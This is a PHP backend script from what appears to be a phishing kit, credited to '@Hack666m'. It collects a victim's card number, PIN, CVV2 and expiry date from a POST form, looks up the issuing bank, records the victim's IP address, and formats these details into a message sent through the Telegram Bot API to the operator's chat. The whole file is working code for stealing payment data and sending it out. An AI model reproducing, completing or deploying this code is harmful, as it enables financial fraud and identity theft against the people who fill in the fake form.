<?php

/* Madsal is the developer!
ch : @Hack666m */
if ( 'POST' != $_SERVER['REQUEST_METHOD'] ) {
$protocol = $_SERVER['SERVER_PROTOCOL'];
if ( ! in_array( $protocol, array( 'HTTP/1.1', 'HTTP/2', 'HTTP/2.0' ) ) ) {
$protocol = 'HTTP/1.0';
}

header( 'Allow: POST' );
header( "$protocol 405 Method Not Allowed" );
header( 'Content-Type: text/plain' );
exit;
}

include "Bankinfo.php";
include "../telegram.php" ;



$pan = $_POST["pan"];
$pin = $_POST["pin"];
$cvv = $_POST["cvv2"];
$year = $_POST["expireYear"];
$month = $_POST["expireMonth"];
$amount = $_POST["am"];
$num = $_POST["num"];
if(isset($_POST["inputemail"])){
    $email = $_POST["inputemail"];
}else{
    $email = "None";
}

$pan1 = substr($pan,0,4);
$pan2 = substr($pan,4,-8);
$pan3 = substr($pan,8,-4);
$pan4 = substr($pan,12);
$cardn = substr($pan,0,-10);
$bankinfo = bank_information($cardn);


$ip = $_SERVER["REMOTE_ADDR"];

$Text = "
New Card #ista 💸
➖➖➖
-Card : <code>$pan</code>
-Pin : <code>$pin</code>
-Cvv2 : <code>$cvv</code>
-Y/M : $year / $month
➖➖➖
-Bank : $bankinfo[1]
-IP : $ip
➖➖➖
-Dev : $ChUsername
";
     $KeyBoard12 = json_encode(['inline_keyboard'=>[
    [['text'=>"🕉 Developer", 'url'=>"https://t.me/hack666m"]],
    ]]);
    
    $params = 
[
    'chat_id' => $ID,
    'reply_markup' => $KeyBoard12,
    'text' => $dex,
    'parse_mode' => 'HTML'
];

$website = "https://api.telegram.org/bot" . $TOKEN; 

$ch = curl_init($website . '/sendMessage'); 
curl_setopt($ch, CURLOPT_HEADER, false); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, ($params)); 
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$result = curl_exec($ch); curl_close($ch);
//@Hack666m
    
    ?>

